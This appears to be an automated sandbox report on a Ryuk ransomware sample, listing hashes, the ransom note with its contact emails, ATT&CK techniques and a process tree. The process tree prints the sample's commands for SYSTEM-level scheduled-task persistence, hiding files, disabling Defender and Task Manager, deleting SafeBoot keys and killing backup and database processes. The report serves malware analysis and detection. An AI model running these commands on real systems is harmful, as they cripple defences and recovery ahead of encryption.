Analysis

  • max time kernel
    47s
  • max time network
    34s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    09-03-2023 18:31

General

  • Target

    Ryuk86.bin.exe

  • Size

    767KB

  • MD5

    d2e194259106bca3b42dc8690d340b59

  • SHA1

    edcd63a3125854ed72cb5811f08644a87e265e3b

  • SHA256

    788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

  • SHA512

    4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

  • SSDEEP

    12288:RnBkozA9lzIeVJ+OeO+OeNhBBhhBBUA9CGkIDIP6J9kgnDC3TbqUttRrvCsZ+nt2:jkozAjK95DIP4DCDbq8tRrvB

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note
Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at Vulcanteam@CYBERFEAR.COM or vulcanteam@inboxhub.net You will receive btc address for payment in the reply letter Ryuk No system is safe
Emails

Vulcanteam@CYBERFEAR.COM

vulcanteam@inboxhub.net

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

  • Disables Task Manager via registry modification
  • Drops startup file 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1348
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1468
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:932
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
      • Drops startup file
      PID:916
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
        PID:1708
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:568
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
          3⤵
          • Creates scheduled task(s)
          PID:968
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:472
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
          3⤵
          • Drops startup file
          • Views/modifies file attributes
          PID:1328
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /RU SYSTEM /RL HIGHEST /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:268
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /RU SYSTEM /RL HIGHEST /F
          3⤵
          • Creates scheduled task(s)
          PID:524
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:684
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /F
          3⤵
          • Creates scheduled task(s)
          PID:1320
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:588
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h +s ryuk.exe
          3⤵
          • Views/modifies file attributes
          PID:1240
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:984
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
        2⤵
          PID:812
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
            3⤵
              PID:696
              • C:\Windows\SysWOW64\icacls.exe
                icacls * /grant Everyone:(OI)(CI)F /T /C /Q
                4⤵
                • Modifies file permissions
                PID:604
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
            2⤵
              PID:556
              • C:\Windows\SysWOW64\reg.exe
                reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                3⤵
                  PID:1356
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
                2⤵
                  PID:936
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
                  2⤵
                    PID:828
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
                    2⤵
                      PID:1640
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
                      2⤵
                        PID:1500
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
                        2⤵
                          PID:1504
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
                          2⤵
                            PID:1728
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                            2⤵
                              PID:1156
                              • C:\Windows\SysWOW64\reg.exe
                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                3⤵
                                  PID:1708
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                2⤵
                                  PID:768
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                    3⤵
                                      PID:1164
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                    2⤵
                                      PID:1580
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                        3⤵
                                          PID:1616
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                        2⤵
                                          PID:1704
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                            3⤵
                                              PID:560
                                        • C:\Windows\SysWOW64\attrib.exe
                                          attrib +h +s C:\ProgramData\ryuk.exe
                                          1⤵
                                          • Views/modifies file attributes
                                          PID:948
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /t /im veeam*
                                          1⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1544
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /t /f /im sql*
                                          1⤵
                                            PID:1248
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /t /f /im sql*
                                              2⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:612

                                          Network

                                          MITRE ATT&CK Matrix ATT&CK v6

                                          Execution

                                          Scheduled Task

                                          1
                                          T1053

                                          Persistence

                                          Scheduled Task

                                          1
                                          T1053

                                          Hidden Files and Directories

                                          1
                                          T1158

                                          Privilege Escalation

                                          Scheduled Task

                                          1
                                          T1053

                                          Defense Evasion

                                          File Permissions Modification

                                          1
                                          T1222

                                          Hidden Files and Directories

                                          1
                                          T1158

                                          Discovery

                                          Query Registry

                                          1
                                          T1012

                                          Peripheral Device Discovery

                                          1
                                          T1120

                                          System Information Discovery

                                          2
                                          T1082

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.html
                                            Filesize

                                            152B

                                            MD5

                                            a641bf8ac8307aad57ecab53872e67db

                                            SHA1

                                            6fa8d69a859c34b8e75223ed8f426dbdf3d03df7

                                            SHA256

                                            9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce

                                            SHA512

                                            7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4

                                          • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.txt
                                            Filesize

                                            1KB

                                            MD5

                                            f69127370e1f1aede86e881dd446f6aa

                                            SHA1

                                            65298f80e3b97f59ea45179463ab9c5cc3ee9337

                                            SHA256

                                            da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

                                            SHA512

                                            5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

                                          • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
                                            Filesize

                                            767KB

                                            MD5

                                            d2e194259106bca3b42dc8690d340b59

                                            SHA1

                                            edcd63a3125854ed72cb5811f08644a87e265e3b

                                            SHA256

                                            788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

                                            SHA512

                                            4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

                                          • C:\ProgramData\RYUKID
                                            Filesize

                                            8B

                                            MD5

                                            bea6ddd31c498e9f4e9f6bc95923ee3e

                                            SHA1

                                            0cfd17881260146fb9417dbf9694fa6ef2211105

                                            SHA256

                                            8b1a4555eae63973a35fd1727681e65dbfff2bf071ea87aaf6af9fd76548d1b5

                                            SHA512

                                            910998af02ea9f9c6c5156d0a7c247ed14ce6043e712f7cabad00fe9e922e8a1bf4e62963b3da994058257bfa46220b3164a4fceafbabd2cef7ed8631577272f

                                          • C:\ProgramData\RyukReadMe.txt
                                            Filesize

                                            1KB

                                            MD5

                                            f69127370e1f1aede86e881dd446f6aa

                                            SHA1

                                            65298f80e3b97f59ea45179463ab9c5cc3ee9337

                                            SHA256

                                            da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

                                            SHA512

                                            5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

                                          • C:\ProgramData\hrmlog1
                                            Filesize

                                            2KB

                                            MD5

                                            d9876c40c0deeed3a19a371bdc127213

                                            SHA1

                                            86c2e629e33a29ef280896b6415186c119e211e3

                                            SHA256

                                            7436733fab8e99733cdf304ceaeb157e7effe7dfd2d98a5eef747b8ac380f95e

                                            SHA512

                                            00577b55ee16959b5aa81ca6fb924c2facab426e610043e96207440c282253ef80ea52971f97f6cd101e13ec972762c7f834c4fe0cd3ae319b102616f6f85323

                                          • C:\ProgramData\hrmlog1
                                            Filesize

                                            2KB

                                            MD5

                                            d9876c40c0deeed3a19a371bdc127213

                                            SHA1

                                            86c2e629e33a29ef280896b6415186c119e211e3

                                            SHA256

                                            7436733fab8e99733cdf304ceaeb157e7effe7dfd2d98a5eef747b8ac380f95e

                                            SHA512

                                            00577b55ee16959b5aa81ca6fb924c2facab426e610043e96207440c282253ef80ea52971f97f6cd101e13ec972762c7f834c4fe0cd3ae319b102616f6f85323

                                          • C:\ProgramData\hrmlog1
                                            Filesize

                                            2KB

                                            MD5

                                            d9876c40c0deeed3a19a371bdc127213

                                            SHA1

                                            86c2e629e33a29ef280896b6415186c119e211e3

                                            SHA256

                                            7436733fab8e99733cdf304ceaeb157e7effe7dfd2d98a5eef747b8ac380f95e

                                            SHA512

                                            00577b55ee16959b5aa81ca6fb924c2facab426e610043e96207440c282253ef80ea52971f97f6cd101e13ec972762c7f834c4fe0cd3ae319b102616f6f85323

                                          • C:\ProgramData\hrmlog2
                                            Filesize

                                            292B

                                            MD5

                                            f3642fa051609bd3e193a24379b547ec

                                            SHA1

                                            920dca74fd4c08cc17cadf3d7a5169f201296075

                                            SHA256

                                            580771d1987a4bfaf0a917d72ffc3c65e7f83165125f1b15571cf78126c959eb

                                            SHA512

                                            24b5cef7665e9b85e0b5406f2c8fd7cc2134c96f088e436eb3f6ede566a235b5177d80e97339057e1726c6fe7821f931ab8341041f3aebaffd718efe3411f240

                                          • C:\ProgramData\hrmlog2
                                            Filesize

                                            292B

                                            MD5

                                            f3642fa051609bd3e193a24379b547ec

                                            SHA1

                                            920dca74fd4c08cc17cadf3d7a5169f201296075

                                            SHA256

                                            580771d1987a4bfaf0a917d72ffc3c65e7f83165125f1b15571cf78126c959eb

                                            SHA512

                                            24b5cef7665e9b85e0b5406f2c8fd7cc2134c96f088e436eb3f6ede566a235b5177d80e97339057e1726c6fe7821f931ab8341041f3aebaffd718efe3411f240

                                          • C:\ProgramData\hrmlog2
                                            Filesize

                                            292B

                                            MD5

                                            f3642fa051609bd3e193a24379b547ec

                                            SHA1

                                            920dca74fd4c08cc17cadf3d7a5169f201296075

                                            SHA256

                                            580771d1987a4bfaf0a917d72ffc3c65e7f83165125f1b15571cf78126c959eb

                                            SHA512

                                            24b5cef7665e9b85e0b5406f2c8fd7cc2134c96f088e436eb3f6ede566a235b5177d80e97339057e1726c6fe7821f931ab8341041f3aebaffd718efe3411f240

                                          • C:\ProgramData\ryuk.exe
                                            Filesize

                                            767KB

                                            MD5

                                            d2e194259106bca3b42dc8690d340b59

                                            SHA1

                                            edcd63a3125854ed72cb5811f08644a87e265e3b

                                            SHA256

                                            788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

                                            SHA512

                                            4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

                                          • C:\Users\Admin\AppData\Local\Temp\RYUKID
                                            Filesize

                                            8B

                                            MD5

                                            bea6ddd31c498e9f4e9f6bc95923ee3e

                                            SHA1

                                            0cfd17881260146fb9417dbf9694fa6ef2211105

                                            SHA256

                                            8b1a4555eae63973a35fd1727681e65dbfff2bf071ea87aaf6af9fd76548d1b5

                                            SHA512

                                            910998af02ea9f9c6c5156d0a7c247ed14ce6043e712f7cabad00fe9e922e8a1bf4e62963b3da994058257bfa46220b3164a4fceafbabd2cef7ed8631577272f

                                          • C:\Users\Admin\AppData\Local\Temp\hrmlog1
                                            Filesize

                                            2KB

                                            MD5

                                            d9876c40c0deeed3a19a371bdc127213

                                            SHA1

                                            86c2e629e33a29ef280896b6415186c119e211e3

                                            SHA256

                                            7436733fab8e99733cdf304ceaeb157e7effe7dfd2d98a5eef747b8ac380f95e

                                            SHA512

                                            00577b55ee16959b5aa81ca6fb924c2facab426e610043e96207440c282253ef80ea52971f97f6cd101e13ec972762c7f834c4fe0cd3ae319b102616f6f85323

                                          • C:\Users\Admin\AppData\Local\Temp\hrmlog2
                                            Filesize

                                            292B

                                            MD5

                                            f3642fa051609bd3e193a24379b547ec

                                            SHA1

                                            920dca74fd4c08cc17cadf3d7a5169f201296075

                                            SHA256

                                            580771d1987a4bfaf0a917d72ffc3c65e7f83165125f1b15571cf78126c959eb

                                            SHA512

                                            24b5cef7665e9b85e0b5406f2c8fd7cc2134c96f088e436eb3f6ede566a235b5177d80e97339057e1726c6fe7821f931ab8341041f3aebaffd718efe3411f240

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
                                            Filesize

                                            767KB

                                            MD5

                                            d2e194259106bca3b42dc8690d340b59

                                            SHA1

                                            edcd63a3125854ed72cb5811f08644a87e265e3b

                                            SHA256

                                            788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

                                            SHA512

                                            4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13